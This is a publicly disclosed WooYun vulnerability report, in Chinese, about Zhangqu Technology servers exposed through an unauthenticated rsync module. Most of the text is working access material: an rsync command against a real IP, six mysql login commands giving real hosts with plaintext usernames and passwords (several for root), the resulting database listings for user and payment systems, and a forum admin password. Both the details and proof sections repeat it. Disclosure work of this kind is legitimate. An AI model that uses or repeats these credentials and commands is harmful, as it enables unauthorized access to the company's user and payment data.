当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043358

漏洞标题:掌趣科技系统配置不当导致大量数据库信息有被拖库危险(rsync)

相关厂商:掌趣科技

漏洞作者: 盈盈无绪

提交时间:2013-11-20 12:03

修复时间:2014-01-04 12:03

公开时间:2014-01-04 12:03

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

掌趣科技 股票代码:300315
掌趣科技系统配置不当导致大量数据库信息有被拖库危险

详细说明:

rsync 219.232.240.2::case


没有身份认证导致文件外泄,又从这些文件中找到如下数据库权限,数据库授权不严格,导致
任意ip在有用户名密码情况下连接,且权利很高。

掌趣科技
mysql -uroot -pmysql228 -h219.232.240.6
| analyze |
| android |
| bbs |
| cjsh_user |
| cms |
| dx |
| football |
| game_stat |
| game_stat_test |
| gcenter |
| gs |
| lt_wap |
| mis |
| mysql |
| ourpalm |
| ssfee_platform |
| ssfee_platform_test |
| test |
| test_channel |
| union |
| union_test |
| user |
| user_tmp |
| webpay |
| yjws |
| yjws-bak |
mysql -uroot -pmysql35 -h114.66.192.86
| android |
| backup |
| db_sp_gw |
| db_zq_gw |
| echarge |
| mobilecharge |
| mysql |
| paycenter |
| paycenter0708 |
| sms_coop |
| sms_coop2 |
| sms_coop_cz |
| sms_coop_xjoys |
| ssfee_platform |
| stat_fee_xjoys |
| stat_spservice |
| stat_ssfee_logs |
| test |
| webpay |
| webreport |
| webtest |
mysql -uroot -pmysql228 -h124.248.32.246
| analyze |
| bbs |
| bbs_new |
| bbs_test |
| cjsh_user |
| game_stat |
| gcenter |
| mysql |
| ssfee_platform |
| test |
| union |
| user |
| user_tmp |
| webpay |
| yjws |
mysql -ustoneage -pourp@lm -h117.79.132.166
| nagdb |
| stoneage |
| stoneage_18 |
mysql -uwebgame -pmysql39 -h117.79.148.39
| dedecmsv57utf8 |
| dedecmsv57utf8sp1 |
| game |
| gs0708 |
| mysql |
| portal_0708 |
| ultrax |
| user |
mysql -uroot -pmysql242 -h219.232.244.242
| bbs |
| cacti |
| derkhan |
| mysql |
| sanguo_vote |
| stat |
| test |
| webgame_center |
| webpay |
| webpay_test |
| xweibo |
http://bbs.gamebean.com
admin:wanglirong

漏洞证明:

掌趣科技
mysql -uroot -pmysql228 -h219.232.240.6
| analyze |
| android |
| bbs |
| cjsh_user |
| cms |
| dx |
| football |
| game_stat |
| game_stat_test |
| gcenter |
| gs |
| lt_wap |
| mis |
| mysql |
| ourpalm |
| ssfee_platform |
| ssfee_platform_test |
| test |
| test_channel |
| union |
| union_test |
| user |
| user_tmp |
| webpay |
| yjws |
| yjws-bak |
mysql -uroot -pmysql35 -h114.66.192.86
| android |
| backup |
| db_sp_gw |
| db_zq_gw |
| echarge |
| mobilecharge |
| mysql |
| paycenter |
| paycenter0708 |
| sms_coop |
| sms_coop2 |
| sms_coop_cz |
| sms_coop_xjoys |
| ssfee_platform |
| stat_fee_xjoys |
| stat_spservice |
| stat_ssfee_logs |
| test |
| webpay |
| webreport |
| webtest |
mysql -uroot -pmysql228 -h124.248.32.246
| analyze |
| bbs |
| bbs_new |
| bbs_test |
| cjsh_user |
| game_stat |
| gcenter |
| mysql |
| ssfee_platform |
| test |
| union |
| user |
| user_tmp |
| webpay |
| yjws |
mysql -ustoneage -pourp@lm -h117.79.132.166
| nagdb |
| stoneage |
| stoneage_18 |
mysql -uwebgame -pmysql39 -h117.79.148.39
| dedecmsv57utf8 |
| dedecmsv57utf8sp1 |
| game |
| gs0708 |
| mysql |
| portal_0708 |
| ultrax |
| user |
mysql -uroot -pmysql242 -h219.232.244.242
| bbs |
| cacti |
| derkhan |
| mysql |
| sanguo_vote |
| stat |
| test |
| webgame_center |
| webpay |
| webpay_test |
| xweibo |
http://bbs.gamebean.com
admin:wanglirong

修复方案:

你们网管考虑换一批人吧,这个太弱了!

版权声明:转载请注明来源 盈盈无绪@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝